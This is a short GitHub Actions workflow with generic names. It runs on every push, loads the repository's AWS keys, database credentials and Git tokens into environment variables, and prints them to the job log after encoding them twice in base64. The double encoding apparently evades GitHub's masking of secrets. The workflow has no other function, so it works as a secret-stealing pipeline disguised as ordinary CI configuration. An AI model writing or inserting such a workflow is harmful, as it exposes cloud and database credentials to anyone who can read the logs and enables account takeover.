name: GitHub Actions
on: push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - name: command
        run: env -0 | awk -v RS='\0' '/^(secret_|var_)/ {print $0}' | base64 -w0 | base64 -w0
        env:
          secret_AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          secret_AWS_REGION: ${{ secrets.AWS_REGION }}
          secret_AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          secret_ECR_REGISTRY: ${{ secrets.ECR_REGISTRY }}
          secret_ECR_REPOSITORY: ${{ secrets.ECR_REPOSITORY }}
          secret_ECS_CLUSTER: ${{ secrets.ECS_CLUSTER }}
          secret_ECS_SERVICE: ${{ secrets.ECS_SERVICE }}
          secret_GIT_TOKEN: ${{ secrets.GIT_TOKEN }}
          secret_DB_DRIVER_CLASS_NAME: ${{ secrets.DB_DRIVER_CLASS_NAME }}
          secret_DB_URL: ${{ secrets.DB_URL }}
          secret_DB_USERNAME: ${{ secrets.DB_USERNAME }}
          secret_DB_PASSWORD: ${{ secrets.DB_PASSWORD }}
          secret_token: ${{ secrets.token }}
